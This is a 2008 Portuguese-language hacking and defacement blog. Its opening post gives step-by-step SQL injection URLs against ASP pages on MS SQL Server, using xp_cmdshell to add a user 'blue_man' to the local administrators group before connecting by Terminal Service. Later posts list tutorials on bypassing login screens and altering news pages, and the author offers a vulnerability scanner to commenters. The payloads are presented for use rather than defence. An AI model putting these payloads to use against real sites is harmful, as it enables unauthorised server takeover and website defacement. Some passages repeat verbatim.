Exemplo:
www.site.com/noticia.asp?id=10
Basta fazer:
www.site.com/noticia.asp?id=convert(int,(select+user));--
Se aparecer 'dbo' no erro, eh porque é vulnerável. Dai, prossegue:
www.site.com/noticia.asp?id=10;exec%20master..xp_cmdshell 'net user blue_man hacker /add';--
www.site.com/noticia.asp?id=10;exec%20master..xp_cmdshell 'net localgroup administrators blue_man /add';--
Depois eh so conectar via Terminal Service (se este estiver ativado, claro).
Link pro video:
Rooting SQL Server via SQL Injection
quarta-feira, 13 de agosto de 2008
SQL Injection
Textos sobre SQL Injection:
Advanced SQL Injection In SQL Server Applications
Apresenta métodos de como passar por telas de login (ex: admin.asp, login.asp), bem como executar comandos remotamente no servidor.
Uncommon SQL Injection
Excelente texto. Explica como alterar páginas de notícias (p.ex) que estão armazenadas em um banco de dados. Eu desenvolvi um scanner pra este tipo de vulnerabilidade. Se alguem quiser, deixa o email ai nos comentários, que eu repasso se estiver de bom humor.
[spanish] Blind MySQL Injection
Pretendo estudar a parte de "blind" melhor. Parece ser meio complicadinho, mas vamos lá!
Full SQL Injection Tutorial (MySQL)
O prórprio titulo explica. Também focado em "blind".
Advanced SQL Injection In SQL Server Applications
Apresenta métodos de como passar por telas de login (ex: admin.asp, login.asp), bem como executar comandos remotamente no servidor.
Uncommon SQL Injection
Excelente texto. Explica como alterar páginas de notícias (p.ex) que estão armazenadas em um banco de dados. Eu desenvolvi um scanner pra este tipo de vulnerabilidade. Se alguem quiser, deixa o email ai nos comentários, que eu repasso se estiver de bom humor.
[spanish] Blind MySQL Injection
Pretendo estudar a parte de "blind" melhor. Parece ser meio complicadinho, mas vamos lá!
Full SQL Injection Tutorial (MySQL)
O prórprio titulo explica. Também focado em "blind".
Deface2000?
"Deface2000" não é o nome de nenhum grupo "hacker/cracker" (não que eu conheça, ao menos!). É um nome que resolvi em dar a este blog, nada mais.
Mais um blog??? Sim e não. Criei este blog principalmente para guardar lembretes de sites e dicas sobre técnicas hackers e de defacement, bem como de segurança na web, isto é, o intuito é simplesmente pessoal. Assim, tais informaçõs não perdem o risco de serem perdidas toda vez que eu formatar meu PC. Mas, se alguem ai quiser aproveitar algo, faça o que achar melhor, você é o reponsável pelo que faz.
Mais um blog??? Sim e não. Criei este blog principalmente para guardar lembretes de sites e dicas sobre técnicas hackers e de defacement, bem como de segurança na web, isto é, o intuito é simplesmente pessoal. Assim, tais informaçõs não perdem o risco de serem perdidas toda vez que eu formatar meu PC. Mas, se alguem ai quiser aproveitar algo, faça o que achar melhor, você é o reponsável pelo que faz.
Assinar:
Postagens (Atom)